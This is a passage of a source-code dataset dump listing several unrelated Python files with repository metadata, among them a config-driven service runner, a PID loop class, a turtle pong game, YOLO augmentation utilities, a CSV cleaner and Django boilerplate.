Dataset schema (one row per source file; numeric ranges are min/max; ⌀ marks a nullable column):
- blob_id: string (length 40)
- directory_id: string (length 40)
- path: string (length 5 to 283)
- content_id: string (length 40)
- detected_licenses: sequence (length 0 to 41)
- license_type: string (2 distinct values)
- repo_name: string (length 7 to 96)
- snapshot_id: string (length 40)
- revision_id: string (length 40)
- branch_name: string (58 distinct values)
- visit_date: timestamp[us]
- revision_date: timestamp[us]
- committer_date: timestamp[us]
- github_id: int64 (12.7k to 662M, ⌀)
- star_events_count: int64 (0 to 35.5k)
- fork_events_count: int64 (0 to 20.6k)
- gha_license_id: string (11 distinct values)
- gha_event_created_at: timestamp[us]
- gha_created_at: timestamp[us]
- gha_language: string (43 distinct values)
- src_encoding: string (9 distinct values)
- language: string (1 distinct value)
- is_vendor: bool (2 classes)
- is_generated: bool (2 classes)
- length_bytes: int64 (7 to 5.88M)
- extension: string (30 distinct values)
- content: string (length 7 to 5.88M)
- authors: sequence (length 1)
- author: string (length 0 to 73)
0d468ab5f005dc9434a16e44bdaa293e820314a5 | 59b3acec6c6a021528682573e478ced2794c6b03 | /Scripting_tutes_labs/Python Assignment/A2/Part A/WORKS.py | d7b1429acd24e86cd27457f2d7bd0b98d17e34d4 | [] | no_license | charlesluch/Code | f9ed52e5cfb45917baf35277cdf8da68e54332ea | a9d772d73ab40bd01266d7d833dbeab95797bf44 | refs/heads/master | 2021-10-09T01:41:48.815186 | 2018-12-20T02:59:15 | 2018-12-20T02:59:15 | 131,547,087 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,694 | py |
#!/usr/bin/env python3
import io
import json
from subprocess import run, PIPE

realConfig = 'config.json'  # assumed path to the JSON configuration file; the real value is not shown in this file
# errors hit along the way: JSONDecodeError (Extra data), AttributeError, "Expecting double quotes"...
# we need services as a dictionary and flows as an array...
with open(realConfig, 'r') as c:
data = c.read().replace('\n','')
jConfig = json.dumps('"{}"'.format(data))
print(jConfig)
# we were just printing the string with weird added \ characters...
with open(realConfig, 'r') as c:
data = c.read().replace('\n','')
print(data)
# .json is now valid, turns out it was an encoding problem, we needed also to use json.load
with io.open(realConfig, 'r', encoding='utf8') as c:
plan = json.load(c)
print(c)
print(plan)
# we can now call by key as follows:
print(plan['flows']['Append at morning'])
# read the contents of the .json configuration file and let that file dictate the actions of the program.
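# For reference, the config shape the loop below assumes (hypothetical
# example; the real config file is not included here):
# {
#     "services": {"Append at morning": {"program": "append.py"}},
#     "flows": {"Append at morning": ["Append at morning"]}
# }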
for flow in plan['flows']:
print("\nFlow is:", flow)
for service in plan['flows'][flow]:
print("\tcalling service:", service)
# open the service and run the external program
programFile = plan['services'][service]['program']
print(programFile)
        p = run(programFile, stdout=PIPE, input='', encoding='utf-8', shell=True) # Thanks Amy Dempster; shell expects the boolean True, not the string 'true'
print(p.returncode)
print(p.stdout)
# print statements for testing
# Morning
# print(args.start, start)
# if not args.start:
# start = "00:00:00"
# else:
# start = args.start
#
# if not args.end:
# end = "11:59:59"
# else:
# end = args.end
#
# now = sys.stdin.read()
#
| [
"[email protected]"
] | |
71bd675ad4473f0c69d41c815af1baea3a5524f6 | 1427d0409ea9d0b578890d9e8e01fd5d1df70bf4 | /components/loop.py | e80ff4d8272f2ee0de86f220c36beec9d7df1f35 | [
"MIT"
] | permissive | mradrianhh/PID-265DS | 2e3a1097928a16bf31c6b8c2fdcb82c454c3efbd | 963d2f3ce1402cf1600e21ed4e9bc2054dc39024 | refs/heads/main | 2023-08-06T11:03:19.120774 | 2021-10-04T22:17:27 | 2021-10-04T22:17:27 | 411,594,164 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,878 | py |
from .actuator import Actuator
from .sensor import Sensor
class Loop(object):
__tag: str
__actuators: "dict[str, Actuator]"
__sensors: "dict[str, Sensor]"
__target_value: float = 0.0
__actual_value: float = 0.0
__error: float # target_value - actual_value
__proportional_proportionality_factor: float
__integral_proportionality_factor: float
__differential_proportionality_factor: float
    def __init__(self, tag: str, actuators: "dict[str, Actuator]" = None, sensors: "dict[str, Sensor]" = None, proportional_proportionality_factor: float = 0.0, integral_proportionality_factor: float = 0.0, differential_proportionality_factor: float = 0.0):
        # Default to None and build fresh dicts here: a mutable default
        # argument would be shared across all Loop instances.
        self.__actuators = actuators if actuators is not None else {}
        self.__sensors = sensors if sensors is not None else {}
        self.__tag = tag
        self.__proportional_proportionality_factor = proportional_proportionality_factor
        self.__integral_proportionality_factor = integral_proportionality_factor
        self.__differential_proportionality_factor = differential_proportionality_factor
def calculate_error(self):
self.__error = self.__target_value - self.__actual_value
def calculate_proportional(self) -> float:
return self.__error * self.__proportional_proportionality_factor
def print_information(self):
print(self.__tag)
print(f'Target value : {self.__target_value}')
print(f'Actual value: {self.__actual_value}')
print("Actuators:")
for key in self.__actuators.keys():
print(f'\t{key} : {self.__actuators[key].get_desc()}')
print("Sensors:")
for key in self.__sensors.keys():
print(f'\t{key} : {self.__sensors[key].get_desc()}')
def add_actuator(self, actuator: Actuator):
self.__actuators[actuator.get_tag()] = actuator
def add_sensor(self, sensor: Sensor):
self.__sensors[sensor.get_tag()] = sensor
def get_target_value(self) -> float:
return self.__target_value
def set_target_value(self, target_value: float):
self.__target_value = target_value
def get_actual_value(self) -> float:
return self.__actual_value
def set_actual_value(self, actual_value: float):
self.__actual_value = actual_value
def get_actuators(self) -> "dict[str, Actuator]":
return self.__actuators
def get_actuator(self, key) -> Actuator:
return self.__actuators[key]
def get_sensors(self) -> "dict[str, Sensor]":
return self.__sensors
def get_sensor(self, key) -> Sensor:
return self.__sensors[key]
def get_proportional_proportionality_factor(self) -> float:
return self.__proportional_proportionality_factor
def set_proportional_proportionality_factor(self, proportional_proportionality_factor: float):
self.__proportional_proportionality_factor = proportional_proportionality_factor
def get_integral_proportionality_factor(self) -> float:
return self.__integral_proportionality_factor
def set_integral_proportionality_factor(self, integral_proportionality_factor: float):
self.__integral_proportionality_factor = integral_proportionality_factor
def get_differential_proportionality_factor(self) -> float:
return self.__differential_proportionality_factor
def set_differential_proportionality_factor(self, differential_proportionality_factor: float):
self.__differential_proportionality_factor = differential_proportionality_factor
def get_error(self) -> float:
return self.__error
def set_error(self, error: float):
self.__error = error
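# Minimal usage sketch (values are made up):
#   loop = Loop("temperature", {}, {}, proportional_proportionality_factor=0.5)
#   loop.set_target_value(21.0)
#   loop.set_actual_value(19.5)
#   loop.calculate_error()                  # error = 21.0 - 19.5 = 1.5
#   output = loop.calculate_proportional()  # 1.5 * 0.5 = 0.75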
| [
"[email protected]"
] | |
a908e07377adf924eff8803c3ecc541a1bbb1fb3 | c4ba4ac1c54dd31ac0dd2da9881a76adba2b8640 | /game1.py | 7ebe69909e16a6546b602919bb9b8207b8217ce9 | [] | no_license | sirishavemavarapu1/MyProject1 | 1dd2f76c672d92e1e81f6426691eef4883ed956e | 8aa263e467a88b65d5bee247e4f1eb841c9b02d3 | refs/heads/master | 2023-06-20T12:52:26.176798 | 2021-07-16T05:15:42 | 2021-07-16T05:15:42 | 386,189,814 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,468 | py |
import turtle
import random
wn=turtle.Screen()
wn.title("First game")
wn.bgcolor("blue")
wn.setup(width=800,height=600)
#wn.tracer(0)
# tracer stops the window to update
score_a=0
score_b=0
#paddle A
paddle_a=turtle.Turtle()
paddle_a.speed(0)
paddle_a.shape("square")
paddle_a.color("white")
paddle_a.shapesize(stretch_wid=5,stretch_len=1)
paddle_a.penup()
paddle_a.goto(-350,0)
#paddle
paddle_b=turtle.Turtle()
paddle_b.speed(0)
paddle_b.shape("square")
paddle_b.color("white")
paddle_b.shapesize(stretch_wid=5,stretch_len=1)
paddle_b.penup()
paddle_b.goto(350,0)
#Ball
ball=turtle.Turtle()
ball.speed(3)
ball.shape("square")
ball.color("grey")
ball.penup()
ball.dx = random.choice([-2, -1, 1, 2])  # nonzero so the ball always moves horizontally
ball.dy = random.choice([-2, -1, 1, 2])  # nonzero so the ball always moves vertically
#Pen
pen=turtle.Turtle()
pen.speed(0)
pen.color("white")
pen.penup()
pen.hideturtle()
pen.goto(0,260)
pen.write("Player A: 0  Player B: 0", align="center", font=("Courier", 24, "normal"))  # turtle expects a (name, size, style) font triple
#Function
def paddle_a_up():
y=paddle_a.ycor()
y+=10
paddle_a.sety(y)
#KEYBOARD BINDING
wn.listen()
wn.onkeypress(paddle_a_up,"Up")
def paddle_a_down():
y=paddle_a.ycor()
y-=10
paddle_a.sety(y)
#KEYBOARD BINDING
wn.listen()
wn.onkeypress(paddle_a_down,"Down")
def paddle_b_up():
y=paddle_b.ycor()
y+=10
paddle_b.sety(y)
wn.listen()
wn.onkeypress(paddle_b_up,"a")
def paddle_b_down():
y=paddle_b.ycor()
y-=10
paddle_b.sety(y)
wn.listen()
wn.onkeypress(paddle_b_down,"z")
while True:
wn.update()
# Ball move
ball.setx(ball.xcor()+ball.dx)
ball.sety(ball.ycor()+ball.dy)
#Border check
if ball.ycor()>290:
ball.sety(290)
ball.dy *=-1
if ball.ycor()<-290:
ball.sety(-290)
ball.dy *=-1
if ball.xcor()>390:
ball.goto(0,0)
ball.dx *=-1
score_a +=1
pen.clear()
        pen.write("Player A: {}  Player B: {}".format(score_a, score_b), align="center", font=("Courier", 24, "normal"))
if ball.xcor()<-390:
ball.goto(0,0)
ball.dx *=-1
score_b +=1
pen.clear()
        pen.write("Player A: {}  Player B: {}".format(score_a, score_b), align="center", font=("Courier", 24, "normal"))
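    # Paddle collision: the ball counts as hitting a paddle when its x lies in
    # the 340..350 band (or -350..-340) and its y is within 40 px of the
    # paddle centre.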
if ball.xcor()>340 and ball.xcor()<350 and (ball.ycor()<paddle_b.ycor()+40 and ball.ycor()>paddle_b.ycor()-40):
ball.setx(340)
ball.dx*=-1
if ball.xcor()<-340 and ball.xcor()>-350 and (ball.ycor()<paddle_a.ycor()+40 and ball.ycor()>paddle_a.ycor()-40):
ball.setx(-340)
ball.dx*=-1
| [
"[email protected]"
] | |
725a87acfa6b9893392924065b343ae9ea341df9 | 7bf9b2aaed98c2b7c86b95c90f313983b0691fe9 | /pythonlib/amlrealtimeai/external/tensorflow/core/framework/iterator_pb2.py | aedc327b8d2350119283be7844be0d28138a1fa4 | [
"Apache-2.0",
"MIT",
"LicenseRef-scancode-generic-cla"
] | permissive | Azure/aml-real-time-ai | c6b46fd8c7f368324344cf375aae59b213842cfc | 7c034be63119a59e91671d4ae401e041d8240751 | refs/heads/master | 2023-06-10T09:28:07.276953 | 2023-05-31T18:48:21 | 2023-05-31T18:48:21 | 131,752,395 | 151 | 47 | MIT | 2023-05-31T18:48:23 | 2018-05-01T19:08:55 | C# | UTF-8 | Python | false | true | 2,736 | py |
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: tensorflow/core/framework/iterator.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='tensorflow/core/framework/iterator.proto',
package='tensorflow',
syntax='proto3',
serialized_pb=_b('\n(tensorflow/core/framework/iterator.proto\x12\ntensorflow\"6\n\x15IteratorStateMetadata\x12\x0f\n\x07version\x18\x01 \x01(\t\x12\x0c\n\x04keys\x18\x02 \x03(\tB*\n\x13org.tensorflow.utilB\x0eIteratorProtosP\x01\xf8\x01\x01\x62\x06proto3')
)
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
_ITERATORSTATEMETADATA = _descriptor.Descriptor(
name='IteratorStateMetadata',
full_name='tensorflow.IteratorStateMetadata',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='version', full_name='tensorflow.IteratorStateMetadata.version', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='keys', full_name='tensorflow.IteratorStateMetadata.keys', index=1,
number=2, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=56,
serialized_end=110,
)
DESCRIPTOR.message_types_by_name['IteratorStateMetadata'] = _ITERATORSTATEMETADATA
IteratorStateMetadata = _reflection.GeneratedProtocolMessageType('IteratorStateMetadata', (_message.Message,), dict(
DESCRIPTOR = _ITERATORSTATEMETADATA,
__module__ = 'tensorflow.core.framework.iterator_pb2'
# @@protoc_insertion_point(class_scope:tensorflow.IteratorStateMetadata)
))
_sym_db.RegisterMessage(IteratorStateMetadata)
DESCRIPTOR.has_options = True
DESCRIPTOR._options = _descriptor._ParseOptions(descriptor_pb2.FileOptions(), _b('\n\023org.tensorflow.utilB\016IteratorProtosP\001\370\001\001'))
# @@protoc_insertion_point(module_scope)
| [
"[email protected]"
] | |
70186ad60d9b16a7751a346403b63c9323ac7cc7 | 00c1246152ab64a7fff54f5937111da7b183a341 | /yolo3/utils.py | 860e1e45bae011ff2938a89ef9594c1ae49b1aee | [] | no_license | alejandrobalderas/ObjectDetectionJetsonNano | 80cfc4cbf67e6b2839eab15b58af262846415c07 | d42d5ac082af2da38cce9e3cc7206e16868c1042 | refs/heads/master | 2022-11-27T15:36:34.442663 | 2020-03-30T09:33:15 | 2020-03-30T09:33:15 | 251,260,189 | 0 | 0 | null | 2022-11-22T02:42:23 | 2020-03-30T09:32:58 | Python | UTF-8 | Python | false | false | 4,210 | py |
"""Miscellaneous utility functions."""
import matplotlib.pyplot as plt
from functools import reduce
from PIL import Image
import numpy as np
from matplotlib.colors import rgb_to_hsv, hsv_to_rgb
def compose(*funcs):
"""Compose arbitrarily many functions, evaluated left to right.
Reference: https://mathieularose.com/function-composition-in-python/
"""
# return lambda x: reduce(lambda v, f: f(v), funcs, x)
if funcs:
return reduce(lambda f, g: lambda *a, **kw: g(f(*a, **kw)), funcs)
else:
raise ValueError('Composition of empty sequence not supported.')
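# e.g. compose(f, g, h)(x) evaluates h(g(f(x))): functions are applied left to right.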
def letterbox_image(image, size):
'''resize image with unchanged aspect ratio using padding'''
iw, ih = image.size
w, h = size
scale = min(w/iw, h/ih)
nw = int(iw*scale)
nh = int(ih*scale)
image = image.resize((nw, nh), Image.BICUBIC)
new_image = Image.new('RGB', size, (128, 128, 128))
new_image.paste(image, ((w-nw)//2, (h-nh)//2))
return new_image
def rand(a=0, b=1):
return np.random.rand()*(b-a) + a
def get_random_data(annotation_line, input_shape, random=True, max_boxes=20, scale_min=0.5, scale_max=1.5, jitter=.3, hue=.1, sat=1.5, val=1.5, flip_image=True, proc_img=True):
'''random preprocessing for real-time data augmentation'''
line = annotation_line.split()
image = Image.open(line[0])
iw, ih = image.size
h, w = input_shape
box = np.array([np.array(list(map(int, box.split(','))))
for box in line[1:]])
if not random:
# resize image
scale = min(w/iw, h/ih)
nw = int(iw*scale)
nh = int(ih*scale)
dx = (w-nw)//2
dy = (h-nh)//2
image_data = 0
if proc_img:
image = image.resize((nw, nh), Image.BICUBIC)
new_image = Image.new('RGB', (w, h), (128, 128, 128))
new_image.paste(image, (dx, dy))
image_data = np.array(new_image)/255.
# correct boxes
box_data = np.zeros((max_boxes, 5))
if len(box) > 0:
np.random.shuffle(box)
if len(box) > max_boxes:
box = box[:max_boxes]
box[:, [0, 2]] = box[:, [0, 2]]*scale + dx
box[:, [1, 3]] = box[:, [1, 3]]*scale + dy
box_data[:len(box)] = box
return image_data, box_data
# =========== If random=True then this part will be executed ============
# resize image
new_ar = w/h * rand(1-jitter, 1+jitter)/rand(1-jitter, 1+jitter)
scale = rand(scale_min, scale_max)
if new_ar < 1:
nh = int(scale*h)
nw = int(nh*new_ar)
else:
nw = int(scale*w)
nh = int(nw/new_ar)
image = image.resize((nw, nh), Image.BICUBIC)
# place image
dx = int(rand(0, w-nw))
dy = int(rand(0, h-nh))
new_image = Image.new('RGB', (w, h), (128, 128, 128))
new_image.paste(image, (dx, dy))
image = new_image
# flip image or not
if flip_image:
flip = rand() < .5
if flip:
image = image.transpose(Image.FLIP_LEFT_RIGHT)
else:
flip = False
# distort image
hue = rand(-hue, hue)
sat = rand(1, sat) if rand() < .5 else 1/rand(1, sat)
val = rand(1, val) if rand() < .5 else 1/rand(1, val)
x = rgb_to_hsv(np.array(image)/255.)
x[..., 0] += hue
x[..., 0][x[..., 0] > 1] -= 1
x[..., 0][x[..., 0] < 0] += 1
x[..., 1] *= sat
x[..., 2] *= val
x[x > 1] = 1
x[x < 0] = 0
image_data = hsv_to_rgb(x) # numpy array, 0 to 1
# correct boxes
box_data = np.zeros((max_boxes, 5))
if len(box) > 0:
np.random.shuffle(box)
box[:, [0, 2]] = box[:, [0, 2]]*nw/iw + dx
box[:, [1, 3]] = box[:, [1, 3]]*nh/ih + dy
if flip:
box[:, [0, 2]] = w - box[:, [2, 0]]
box[:, 0:2][box[:, 0:2] < 0] = 0
box[:, 2][box[:, 2] > w] = w
box[:, 3][box[:, 3] > h] = h
box_w = box[:, 2] - box[:, 0]
box_h = box[:, 3] - box[:, 1]
box = box[np.logical_and(box_w > 1, box_h > 1)] # discard invalid box
if len(box) > max_boxes:
box = box[:max_boxes]
box_data[:len(box)] = box
return image_data, box_data
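# Usage sketch (hypothetical annotation line "img.jpg 10,20,110,220,0",
# i.e. an image path followed by x_min,y_min,x_max,y_max,class_id boxes):
#   image_data, box_data = get_random_data(line, input_shape=(416, 416))
#   # image_data: (416, 416, 3) floats in [0, 1]; box_data: (max_boxes, 5)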
| [
"[email protected]"
] | |
e20ffc086d056723ee99ecdb3a25ac016a38eee8 | bfda406cd58709f7ac633802203d133f87bab0a6 | /xmlparse.py | 26f9c83c38f6bf44b0f246084a3211984bd3e817 | [] | no_license | AkshayAgrawal1997/Floor-Plan | 8e3b2dcdee8e333fbe65d335b5ce45afeea0ef52 | 33df7f2b7fd033dcbee4d17c1e60b2973bd50c71 | refs/heads/master | 2021-09-24T03:40:27.405770 | 2018-10-02T20:28:36 | 2018-10-02T20:28:36 | 112,031,921 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 127 | py |
import xml.etree.ElementTree as ET
tree = ET.parse('sample.xml')
root = tree.getroot()
print(root[1][3].text)
print(len(root[1]))
| [
"[email protected]"
] | |
b3c86a9f339858c77e142a9a3e97aa7df42aaa98 | 8860be2d991b21c4f25f3470750cad840138b080 | /remvBlank.py | 2c6f110bb6dc03f002c9d742a057c80cad602aee | [] | no_license | neeschal00/pythonscript | 791f2528ebadcf6b71dc537047794b3640b90b5d | 69fb2b7e93ea793688c76ca8e04da694961f10ba | refs/heads/main | 2023-01-11T17:49:11.721389 | 2022-12-29T14:08:01 | 2022-12-29T14:08:01 | 218,926,259 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,017 | py |
# import pandas as pd
import os
import csv
import time
import sys
# Target directory: first command-line argument, falling back to the CWD.
dir_path = sys.argv[1] if len(sys.argv) > 1 else os.getcwd()
dir_file = dir_path
'''
for files in os.listdir(dir_file):
# print(files)
if(files.endswith(".csv")):
df = pd.read_csv(files)
output_file = files.split(".csv")
output_file = output_file[0]+"1"+".csv"
df.to_csv(output_file,index=False)
os.remove(files)
os.rename(output_file,files)
'''
for files in os.listdir(dir_file):
# print(files)
if(files.endswith(".csv")):
with open(files, newline='') as in_file:
out_fileN = files.split(".csv")
out_fileN = out_fileN[0]+"1"+".csv"
with open(out_fileN, 'w', newline='') as out_file:
writer = csv.writer(out_file)
for row in csv.reader(in_file):
if row:
writer.writerow(row)
time.sleep(3)
os.remove(files)
os.rename(out_fileN,files)
files = ''
        out_fileN = ''
| [
"[email protected]"
] | |
447c19a5107b03a7d4b4af3821ff647e0c6877bf | 296fdc87527328f428f4a500a18cdba4e8051d1a | /ETL_Project_Traffic_Data.py | 7ebe69909e16a6546b602919bb9b8207b8217ce9 | [] | no_license | jimknopp2/jimknopp2.github.io | 9da0a60624d282924e8fb6a59df1af8f1fbcc1d9 | 7319eb74dcc27c5821f7ad5a9c69bdc906717b9c | refs/heads/master | 2022-11-30T15:58:17.243551 | 2020-08-04T00:48:05 | 2020-08-04T00:48:05 | 280,679,744 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,278 | py |
#!/usr/bin/env python
# coding: utf-8
# In[19]:
import pandas as pd
# In[20]:
may2020_path = r"C:\Users\jimkn\Desktop\Trips_by_Distance_May_2020.csv"
May_2020_Travel = pd.read_csv(may2020_path)
May_2020_Travel = May_2020_Travel.drop(["State FIPS", "County FIPS", "Population Staying at Home", "Population Not Staying at Home"], axis=1)
May_2020_Travel.head()
# In[21]:
may2019_path = r"C:\Users\jimkn\Desktop\Trips_by_Distance_May_2019.csv"
May_2019_Travel = pd.read_csv(may2019_path)
May_2019_Travel = May_2019_Travel.drop(["State FIPS", "County FIPS", "Population Staying at Home", "Population Not Staying at Home"], axis=1)
May_2019_Travel.head()
# In[22]:
June2020_path = r"C:\Users\jimkn\Downloads\Trips_by_Distance (4).csv"
June_2020_Travel = pd.read_csv(June2020_path)
June_2020_Travel = June_2020_Travel.drop(["State FIPS", "County FIPS", "Population Staying at Home", "Population Not Staying at Home"], axis=1)
June_2020_Travel.head()
# In[23]:
April2020_path = r"C:\Users\jimkn\Downloads\Trips_by_Distance (6).csv"
April_2020_Travel = pd.read_csv(April2020_path)
April_2020_Travel = April_2020_Travel.drop(["State FIPS", "County FIPS", "Population Staying at Home", "Population Not Staying at Home"], axis=1)
April_2020_Travel.head()
# In[24]:
April2019_path = r"C:\Users\jimkn\Downloads\Trips_by_Distance (7).csv"
April_2019_Travel = pd.read_csv(April2019_path)
April_2019_Travel = April_2019_Travel.drop(["State FIPS", "County FIPS", "Population Staying at Home", "Population Not Staying at Home"], axis=1)
April_2019_Travel.head()
# In[25]:
June2019_path = r"C:\Users\jimkn\Downloads\Trips_by_Distance (8).csv"
June_2019_Travel = pd.read_csv(June2019_path)
June_2019_Travel = June_2019_Travel.drop(["State FIPS", "County FIPS", "Population Staying at Home", "Population Not Staying at Home"], axis=1)
June_2019_Travel.head()
# In[37]:
last_year_frames = [April_2019_Travel, May_2019_Travel, June_2019_Travel]
last_year_traffic = pd.concat(last_year_frames)
lytraffic = last_year_traffic.drop([88], axis=0)
lytraffic
# In[38]:
current_year_frames = [April_2020_Travel, May_2020_Travel, June_2020_Travel]
current_year_traffic = pd.concat(current_year_frames)
cytraffic = current_year_traffic.drop([88], axis=0)
cytraffic
# In[ ]:
| [
"[email protected]"
] | |
deae2c718014d5c62b18f3b9e662a51d775816b0 | 016af41dca1629ed042005066c7f0dfc0f5690ee | /LcvSeach/wsgi.py | c17746d92d5e4968a52e851804e66ba10b10a1e6 | [] | no_license | Coder-Chandler/SearchEngine | 5b193594f155165a498efe59a01288e8c46aba50 | 88308442147b22c67329b7de6b4835cf56da2cfa | refs/heads/master | 2020-12-07T13:33:15.910860 | 2017-10-25T17:55:34 | 2017-10-25T17:55:34 | 95,567,710 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 394 | py |
"""
WSGI config for LcvSeach project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "LcvSeach.settings")
application = get_wsgi_application()
| [
"[email protected]"
] | |
329b21243aab082238f73114c3a49a0339ffa20e | 7e59030ba3cb4461b95102c443e0d7803ec4b03a | /templates/skeleton.py | 4630d3741cbcc9f45d0231da256711c3f39bce4d | [] | no_license | vsmayberry/.vim | 3ce65ccd87e619ceb6136589a2aaf7b3b3be1e70 | 4fd3798fbea36beab791a6bc976831e49aa33c31 | refs/heads/master | 2021-01-18T15:04:12.926365 | 2018-08-25T03:13:59 | 2018-08-25T03:13:59 | 15,790,383 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 72 | py |
#!/usr/bin/env python3
#author Virgil Mayberry
#Created taimilolotonga
| [
"[email protected]"
] | |
41c3785835279daff1c3c4c7f5c68c4bdd5231fd | 5d21c218fbc95bfd9be45f8ca87d3b052820208a | /bin/django-admin.py | 3cade6c78c2f734b4e0106e01a1c37c2e5988cca | [] | no_license | the-breanne/S2-backend | 10bda0c1776a4a56e7888659544279ed962814af | 9fb3ea6cca16b1c999b235ba26c1749cebca3ece | refs/heads/master | 2023-09-05T08:56:03.484042 | 2021-11-20T02:07:33 | 2021-11-20T02:07:33 | 429,977,884 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 145 | py |
#!/Users/breanne/vue_env/bin/python3.8
from django.core import management
if __name__ == "__main__":
management.execute_from_command_line()
| [
"[email protected]"
] | |
7a6075aacbec7cc6a15f3906fd25a51906a263ab | 038c73ff79d5276f327b717ae718ca3168eca920 | /Adaptive_Python/lesson1/task5/task.py | 137472f3ef79b9ac32f812b0a7fb62d62b68ec18 | [] | no_license | noahholley/python_problems | 9b7fa63fdda328ac7ef779caafc9c5bf6eb8aac3 | 0dcd88e46d37f69e83ded8d9f641fe77747cff4a | refs/heads/master | 2021-07-05T12:25:52.139669 | 2017-09-26T21:50:51 | 2017-09-26T21:50:51 | 104,807,206 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 389 | py |
"""Transform the symbol into uppercase.
Input data
A single symbol.
Output data
If the entered symbol is a lowercase letter of the Latin alphabet, output the same uppercase letter. Otherwise, output the symbol that was entered.
Sample Input:
b
Sample Output:
B
Memory limit: 256 Mb
Time limit: 1s"""
data = input()
# Uppercase only lowercase Latin letters; any other symbol is echoed
# unchanged, exactly as the statement requires.
if 'a' <= data <= 'z':
    print(data.upper())
else:
    print(data)
| [
"[email protected]"
] | |
2d27e1435dbaa00e56a153b88d9dae978c026ef7 | 6c1c5ebe4c27663030745cf1b7a6d520bb1e6837 | /api/models.py | e4b65ac632566e0b3ab62bdaba5ec6ae899e4fe9 | [] | no_license | bryanmarthin/django-wishlist | 7160a0cbd9078b2a1e41f4ab07a20726d1ea4069 | f7a9d05428170d6d4447347a793ae6973a3b25f6 | refs/heads/master | 2020-04-09T18:35:20.885703 | 2015-09-12T14:18:49 | 2015-09-12T14:18:49 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 243 | py |
from django.db import models
class Post(models.Model):
class Meta:
db_table = 'Post'
user = models.CharField(max_length=20)
created_at = models.DateTimeField(auto_now_add=True)
    text = models.CharField(max_length=255)
| [
"[email protected]"
] | |
548f33186530791f420e12f279eb3364fff4fcb4 | 1777b71c9c89962f379b8d78e8d459073c78c9ad | /simple_smartsheet/models/__init__.py | bc1b7ccb72f238acbeeefb00f5b0f7f176a51a41 | [
"MIT"
] | permissive | dmfigol/simple-smartsheet | b7ff2c308715905f04784dee185a77944d20c2fa | 0b1010d850dcde4a2f85360932357f7691917936 | refs/heads/master | 2023-01-10T06:28:47.553873 | 2020-02-06T18:44:44 | 2020-02-06T18:44:44 | 151,758,014 | 23 | 10 | MIT | 2023-01-05T17:25:52 | 2018-10-05T17:48:43 | Python | UTF-8 | Python | false | false | 233 | py |
from .cell import Cell
from .column import Column, ColumnType
from .sheet import Sheet # sheet must be before row
from .row import Row
from .report import Report
__all__ = ("Cell", "Column", "ColumnType", "Row", "Sheet", "Report")
| [
"[email protected]"
] | |
b5d8f3348648bca0c54f117af3228da951fb8758 | dfab6798ece135946aebb08f93f162c37dd51791 | /core/luban/ui/validators.py | 31b61b12375a243e0938e106ef4399a516d929a0 | [] | no_license | yxqd/luban | 405f5f7dcf09015d214079fe7e23d644332be069 | 00f699d15c572c8bf160516d582fa37f84ac2023 | refs/heads/master | 2020-03-20T23:08:45.153471 | 2012-05-18T14:52:43 | 2012-05-18T14:52:43 | 137,831,650 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 725 | py |
# -*- Python -*-
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# Jiao Lin
# California Institute of Technology
# (C) 2006-2011 All Rights Reserved
#
# {LicenseText}
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
"""
validators are used to decorate descriptors. for example::
>>> descriptor.validator = validators.choice([1,2])
>>> descriptor.validator = validators.notnull
"""
def choice(items):
def _(v):
if v in items: return
m = "%s not in %s" % (v, items)
raise ValueError(m)
return _
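def notnull(v):
    """Minimal sketch of the ``notnull`` validator referenced in the module
    docstring above; its semantics (reject a null value) are assumed, since
    the original implementation is not shown in this excerpt."""
    if v is None:
        raise ValueError('value must not be null')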
# version
__id__ = "$Id$"
# End of file
| [
"[email protected]"
] | |
2800d80fee09d926e89785da682ec6f1ce2dcc75 | ad8566dace0e4ab4b419b1bb5bc055b095adce72 | /ics/migrations/0060_goal_rank.py | adc9e668bd368dc757f119d3d7750b5a752f5cdb | [] | no_license | mayanb/wafflecone | 6c844c4c908f7c9b8e41d0d42faeefbfa8b9573e | fcd45a3b745232e52af3bdffa3fab25f13c7464d | refs/heads/staging | 2022-12-14T03:34:14.618001 | 2018-09-26T21:35:52 | 2018-09-26T21:35:52 | 74,408,398 | 1 | 0 | null | 2022-12-08T00:46:05 | 2016-11-21T21:40:59 | Python | UTF-8 | Python | false | false | 487 | py |
